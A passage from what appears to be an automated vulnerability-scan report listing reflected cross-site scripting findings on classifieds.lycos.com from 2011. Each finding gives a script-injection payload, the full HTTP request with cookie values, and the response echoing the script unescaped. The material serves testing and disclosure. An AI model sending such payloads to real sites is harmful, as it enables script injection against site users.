HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:18:21 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:21 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24699
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-entertainment-catering/?29655"><script>alert(1)</script>fa8ef175739=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 849a4"><script>alert(1)</script>c69ed26e79e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-health849a4"><script>alert(1)</script>c69ed26e79e/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:19:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:10 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-health849a4"><script>alert(1)</script>c69ed26e79e/?mobile=1" rel="nofollow"> ...[SNIP]...
1.191. http://classifieds.lycos.com/service-health/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-health/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69242"><script>alert(1)</script>2ee2fffe34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-health/?69242"><script>alert(1)</script>2ee2fffe34=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:18:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:24 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37596
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-health/?69242"><script>alert(1)</script>2ee2fffe34=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a035"><script>alert(1)</script>04bdf3b806 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-home-appliance3a035"><script>alert(1)</script>04bdf3b806/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:53:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:34 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-home-appliance3a035"><script>alert(1)</script>04bdf3b806/?mobile=1" rel="nofollow"> ...[SNIP]...
1.193. http://classifieds.lycos.com/service-home-appliance/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-home-appliance/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7003d"><script>alert(1)</script>d18f4482797 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-home-appliance/?7003d"><script>alert(1)</script>d18f4482797=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:53:29 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:29 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-home-appliance/?7003d"><script>alert(1)</script>d18f4482797=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d827"><script>alert(1)</script>3238fd8a0cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-home-plumbing4d827"><script>alert(1)</script>3238fd8a0cb/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:17:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:17:46 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-home-plumbing4d827"><script>alert(1)</script>3238fd8a0cb/?mobile=1" rel="nofollow"> ...[SNIP]...
1.195. http://classifieds.lycos.com/service-home-plumbing/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-home-plumbing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88064"><script>alert(1)</script>504679c49e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-home-plumbing/?88064"><script>alert(1)</script>504679c49e6=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:17:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:17:06 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34189
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-home-plumbing/?88064"><script>alert(1)</script>504679c49e6=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b410"><script>alert(1)</script>a4e52787ed3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-lawn8b410"><script>alert(1)</script>a4e52787ed3/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:18:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:28 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-lawn8b410"><script>alert(1)</script>a4e52787ed3/?mobile=1" rel="nofollow"> ...[SNIP]...
1.197. http://classifieds.lycos.com/service-lawn/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-lawn/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77998"><script>alert(1)</script>8ee624a3fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-lawn/?77998"><script>alert(1)</script>8ee624a3fb9=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:17:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:17:35 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 42508
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-lawn/?77998"><script>alert(1)</script>8ee624a3fb9=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57d23"><script>alert(1)</script>67fb0a91376 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-move57d23"><script>alert(1)</script>67fb0a91376/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:18:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:57 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-move57d23"><script>alert(1)</script>67fb0a91376/?mobile=1" rel="nofollow"> ...[SNIP]...
1.199. http://classifieds.lycos.com/service-move/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-move/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c638e"><script>alert(1)</script>32bb36ba6df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-move/?c638e"><script>alert(1)</script>32bb36ba6df=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:18:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:00 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37365
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-move/?c638e"><script>alert(1)</script>32bb36ba6df=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5587"><script>alert(1)</script>05047fa2e57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-pet-groomingb5587"><script>alert(1)</script>05047fa2e57/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:13:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:13:17 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17715
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-pet-groomingb5587"><script>alert(1)</script>05047fa2e57/?mobile=1" rel="nofollow"> ...[SNIP]...
1.201. http://classifieds.lycos.com/service-pet-grooming/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-pet-grooming/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60266"><script>alert(1)</script>3c094c78936 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-pet-grooming/?60266"><script>alert(1)</script>3c094c78936=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:12:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:42 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-pet-grooming/?60266"><script>alert(1)</script>3c094c78936=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9635"><script>alert(1)</script>e217af7b012 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-pet-sitterd9635"><script>alert(1)</script>e217af7b012/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:53:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:34 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-pet-sitterd9635"><script>alert(1)</script>e217af7b012/?mobile=1" rel="nofollow"> ...[SNIP]...
1.203. http://classifieds.lycos.com/service-pet-sitter/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-pet-sitter/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a172"><script>alert(1)</script>25b1903d5f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-pet-sitter/?9a172"><script>alert(1)</script>25b1903d5f4=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:53:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:24 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24003
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-pet-sitter/?9a172"><script>alert(1)</script>25b1903d5f4=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d0ca"><script>alert(1)</script>968c7855b12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-pet-veterinarian9d0ca"><script>alert(1)</script>968c7855b12/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:14:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:03 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-pet-veterinarian9d0ca"><script>alert(1)</script>968c7855b12/?mobile=1" rel="nofollow"> ...[SNIP]...
1.205. http://classifieds.lycos.com/service-pet-veterinarian/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-pet-veterinarian/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d8a"><script>alert(1)</script>5f431f82572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-pet-veterinarian/?f5d8a"><script>alert(1)</script>5f431f82572=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:13:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:13:34 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27163
